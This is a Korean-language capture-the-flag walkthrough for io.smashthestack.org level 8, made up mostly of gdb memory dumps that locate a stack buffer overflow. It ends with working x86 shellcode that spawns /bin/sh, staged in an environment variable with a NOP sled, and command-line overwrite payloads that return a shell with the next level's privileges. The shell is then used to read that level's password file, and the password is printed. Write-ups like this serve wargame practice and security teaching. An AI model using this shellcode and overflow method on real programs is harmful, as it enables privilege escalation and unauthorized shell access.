io.smashthestack.org – Level 8

Level 8 문제 소스는 아래와 같다.
우선 gdb를 이용하여 디버깅을 해보도록 하자.

level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>:    lea    0x4(%esp),%ecx
0x08048404 <main+4>:    and    $0xfffffff0,%esp
0x08048407 <main+7>:    pushl  -0x4(%ecx)
0x0804840a <main+10>:   push   %ebp
0x0804840b <main+11>:   mov    %esp,%ebp
0x0804840d <main+13>:   push   %ecx
0x0804840e <main+14>:   sub    $0x4,%esp
0x08048411 <main+17>:   mov    0x4(%ecx),%eax
0x08048414 <main+20>:   mov    %eax,(%esp)
0x08048417 <main+23>:   call   0x8048394 <do_the_nasty>
0x0804841c <main+28>:   mov    $0x0,%eax
0x08048421 <main+33>:   add    $0x4,%esp
0x08048424 <main+36>:   pop    %ecx
0x08048425 <main+37>:   pop    %ebp
0x08048426 <main+38>:   lea    -0x4(%ecx),%esp
0x08048429 <main+41>:   ret    
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*10"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*10"`

Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty, 
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdc70:     0xbfffdd14      0xbfffdc90      0xbfffdce8      0x42536455
0xbfffdc80:     0x42424242      0x42424242      0xbfff0042      0x00536455
0xbfffdc90:     0x00000003      0xbfffdd14      0xbfffdd24      0x006e4b18
0xbfffdca0:     0x00000001      0x00000001      0x00000000      0x0804820d
0xbfffdcb0:     0x00659ff4      0x08048480      0x080482f0      0xbfffdce8
0xbfffdcc0:     0xebb92081      0xb2c835fe      0x00000000      0x00000000
0xbfffdcd0:     0x00000000      0x00da02e0      0x0053637d      0x00da7ff4
0xbfffdce0:     0x00000003      0x080482f0      0x00000000      0x08048311
(gdb) x/32wx $esp-50
0xbfffdc3e:     0xdc440000      0x4141bfff      0x41414141      0x41414141
0xbfffdc4e:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdc5e:     0x41414141      0x82f04141      0xdc780804      0x841cbfff
0xbfffdc6e:     0xdd140804      0xdc90bfff      0xdce8bfff      0x6455bfff
0xbfffdc7e:     0x42424253      0x42424242      0x00424242      0x6455bfff
0xbfffdc8e:     0x00030053      0xdd140000      0xdd24bfff      0x4b18bfff
0xbfffdc9e:     0x0001006e      0x00010000      0x00000000      0x820d0000
0xbfffdcae:     0x9ff40804      0x84800065      0x82f00804      0xdce80804
(gdb) x/32wx $esp-48
0xbfffdc40:     0xbfffdc44      0x41414141      0x41414141      0x41414141
0xbfffdc50:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdc60:     0x41414141      0x080482f0      0xbfffdc78      0x0804841c
0xbfffdc70:     0xbfffdd14      0xbfffdc90      0xbfffdce8      0x42536455
0xbfffdc80:     0x42424242      0x42424242      0xbfff0042      0x00536455
0xbfffdc90:     0x00000003      0xbfffdd14      0xbfffdd24      0x006e4b18
0xbfffdca0:     0x00000001      0x00000001      0x00000000      0x0804820d
0xbfffdcb0:     0x00659ff4      0x08048480      0x080482f0      0xbfffdce8
(gdb) x/32wx 0xbfffdc78
0xbfffdc78:     0xbfffdce8      0x42536455      0x42424242      0x42424242
0xbfffdc88:     0xbfff0042      0x00536455      0x00000003      0xbfffdd14
0xbfffdc98:     0xbfffdd24      0x006e4b18      0x00000001      0x00000001
0xbfffdca8:     0x00000000      0x0804820d      0x00659ff4      0x08048480
0xbfffdcb8:     0x080482f0      0xbfffdce8      0xebb92081      0xb2c835fe
0xbfffdcc8:     0x00000000      0x00000000      0x00000000      0x00da02e0
0xbfffdcd8:     0x0053637d      0x00da7ff4      0x00000003      0x080482f0
0xbfffdce8:     0x00000000      0x08048311      0x08048400      0x00000003
(gdb) x/32wx 0xbfffdce8
0xbfffdce8:     0x00000000      0x08048311      0x08048400      0x00000003
0xbfffdcf8:     0xbfffdd14      0x08048480      0x08048430      0x00d9b250
0xbfffdd08:     0xbfffdd0c      0x00da5ae5      0x00000003      0xbfffddf7
0xbfffdd18:     0xbfffde07      0xbfffde28      0x00000000      0xbfffde33
0xbfffdd28:     0xbfffdec0      0xbfffded0      0xbfffdedb      0xbfffdefd
0xbfffdd38:     0xbfffdf10      0xbfffdf1c      0xbfffdf28      0xbfffdf55
0xbfffdd48:     0xbfffdf6b      0xbfffdf7a      0xbfffdf87      0xbfffdf90
0xbfffdd58:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb) q
The program is running.  Exit anyway? (y or n) y
level8@io:/tmp/by8$ 

위에서 보면 argv[2]에 좀 더 값을 주면 흐름을 바꿀 수 있을 것으로 보인다. 다시 한번 해보도록 하자.

level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) disassemble main
Dump of assembler code for function main:
0x08048400 <main+0>:    lea    0x4(%esp),%ecx
0x08048404 <main+4>:    and    $0xfffffff0,%esp
0x08048407 <main+7>:    pushl  -0x4(%ecx)
0x0804840a <main+10>:   push   %ebp
0x0804840b <main+11>:   mov    %esp,%ebp
0x0804840d <main+13>:   push   %ecx
0x0804840e <main+14>:   sub    $0x4,%esp
0x08048411 <main+17>:   mov    0x4(%ecx),%eax
0x08048414 <main+20>:   mov    %eax,(%esp)
0x08048417 <main+23>:   call   0x8048394 <do_the_nasty>
0x0804841c <main+28>:   mov    $0x0,%eax
0x08048421 <main+33>:   add    $0x4,%esp
0x08048424 <main+36>:   pop    %ecx
0x08048425 <main+37>:   pop    %ebp
0x08048426 <main+38>:   lea    -0x4(%ecx),%esp
0x08048429 <main+41>:   ret    
End of assembler dump.
(gdb) b do_the_nasty
Breakpoint 1 at 0x8048398
(gdb) r `python -c "print 'A'*32 + ' ' + 'B'*200"`
Starting program: /levels/level08 `python -c "print 'A'*32 + ' ' + 'B'*200"`

Breakpoint 1, 0x08048398 in do_the_nasty ()
(gdb) n
Single stepping until exit from function do_the_nasty, 
which has no line number information.
0x0804841c in main ()
(gdb) x/32wx $esp
0xbfffdbb0:     0xbfffdc54      0xbfffdbd0      0xbfffdc28      0x423e0455
0xbfffdbc0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc00:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc10:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc20:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx $esp-50
0xbfffdb7e:     0xdb840000      0x4141bfff      0x41414141      0x41414141
0xbfffdb8e:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdb9e:     0x41414141      0x82f04141      0xdbb80804      0x841cbfff
0xbfffdbae:     0xdc540804      0xdbd0bfff      0xdc28bfff      0x0455bfff
0xbfffdbbe:     0x4242423e      0x42424242      0x42424242      0x42424242
0xbfffdbce:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbde:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbee:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx $esp-48
0xbfffdb80:     0xbfffdb84      0x41414141      0x41414141      0x41414141
0xbfffdb90:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffdba0:     0x41414141      0x080482f0      0xbfffdbb8      0x0804841c
0xbfffdbb0:     0xbfffdc54      0xbfffdbd0      0xbfffdc28      0x423e0455
0xbfffdbc0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe0:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf0:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx 0xbfffdbb8
0xbfffdbb8:     0xbfffdc28      0x423e0455      0x42424242      0x42424242
0xbfffdbc8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbd8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbe8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdbf8:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc08:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc18:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc28:     0x42424242      0x42424242      0x42424242      0x42424242
(gdb) x/32wx 0xbfffdc28
0xbfffdc28:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc38:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc48:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc58:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc68:     0x42424242      0x42424242      0x42424242      0x42424242
0xbfffdc78:     0x42424242      0x42424242      0x42424242      0x00424242
0xbfffdc88:     0xbfffdf6b      0xbfffdf7a      0xbfffdf87      0xbfffdf90
0xbfffdc98:     0xbfffdfa2      0xbfffdfaa      0xbfffdfb9      0x00000000
(gdb) 

원하는 대로 흐름이 넘어온 것을 확인할 수 있었다. 따라서 [A 32바이트] + [SHELLCODE의 주소 × 200] 으로 공격을 시도해 보도록 하자.

level8@io:/tmp/by8$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level8@io:/tmp/by8$ gdb /levels/level08
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x804840e
(gdb) r
Starting program: /levels/level08 

Breakpoint 1, 0x0804840e in main ()
(gdb) x/32wx $esp
0xbfffdca4:     0xbfffdcc0      0xbfffdd18      0x00126455      0x08048480
0xbfffdcb4:     0x080482f0      0xbfffdd18      0x00126455      0x00000001
0xbfffdcc4:     0xbfffdd44      0xbfffdd4c      0x005c7b18      0x00000001
0xbfffdcd4:     0x00000001      0x00000000      0x0804820d      0x00249ff4
0xbfffdce4:     0x08048480      0x080482f0      0xbfffdd18      0xebb98081
0xbfffdcf4:     0x30c835fe      0x00000000      0x00000000      0x00000000
0xbfffdd04:     0x00d0d2e0      0x0012637d      0x00d14ff4      0x00000001
0xbfffdd14:     0x080482f0      0x00000000      0x08048311      0x08048400
(gdb) 
0xbfffdd24:     0x00000001      0xbfffdd44      0x08048480      0x08048430
0xbfffdd34:     0x00d08250      0xbfffdd3c      0x00d12ae5      0x00000001
0xbfffdd44:     0xbfffde23      0x00000000      0xbfffde33      0xbfffdec0
0xbfffdd54:     0xbfffded0      0xbfffdedb      0xbfffdefd      0xbfffdf10
0xbfffdd64:     0xbfffdf1c      0xbfffdf28      0xbfffdf55      0xbfffdf6b
0xbfffdd74:     0xbfffdf7a      0xbfffdf87      0xbfffdf90      0xbfffdfa2
0xbfffdd84:     0xbfffdfaa      0xbfffdfb9      0x00000000      0x00000010
0xbfffdd94:     0xbfebfbff      0x00000006      0x00001000      0x00000011
(gdb) 
0xbfffdda4:     0x00000064      0x00000003      0x08048034      0x00000004
0xbfffddb4:     0x00000020      0x00000005      0x00000007      0x00000007
0xbfffddc4:     0x00cfa000      0x00000008      0x00000000      0x00000009
0xbfffddd4:     0x080482f0      0x0000000b      0x000003f0      0x0000000c
0xbfffdde4:     0x000003f0      0x0000000d      0x000003f0      0x0000000e
0xbfffddf4:     0x000003f0      0x00000017      0x00000000      0x0000000f
0xbfffde04:     0xbfffde1b      0x00000000      0x00000000      0x00000000
0xbfffde14:     0x00000000      0x69000000      0x00363836      0x2f000000
(gdb) 
0xbfffde24:     0x6576656c      0x6c2f736c      0x6c657665      0x53003830
0xbfffde34:     0x4c4c4548      0x45444f43      0x9090903d      0x90909090
0xbfffde44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde84:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde94:     0x90909090      0x90909090      0x90909090      0x58176a90
(gdb) q
The program is running.  Exit anyway? (y or n) y
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\x94\xde\xff\xbf'*200"`
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xff\xbf\x94\xde'*200"`        
Segmentation fault
level8@io:/tmp/by8$ /levels/level08 `python -c "print 'A'*32 + ' ' + '\xbf\x94\xde\xff'*200"`    
sh-3.2$ id              
uid=1008(level8) gid=1008(level8) euid=1009(level9) groups=1008(level8),1029(nosu)
sh-3.2$ cat /home/level9/.pass
ynfbxd6t
sh-3.2$ 

쉘코드를 환경변수에 넣으면 스택 상의 주소 위치가 달라지므로, 주소를 조금씩 바꾸어 주다 보면 주소가 맞아떨어진다.
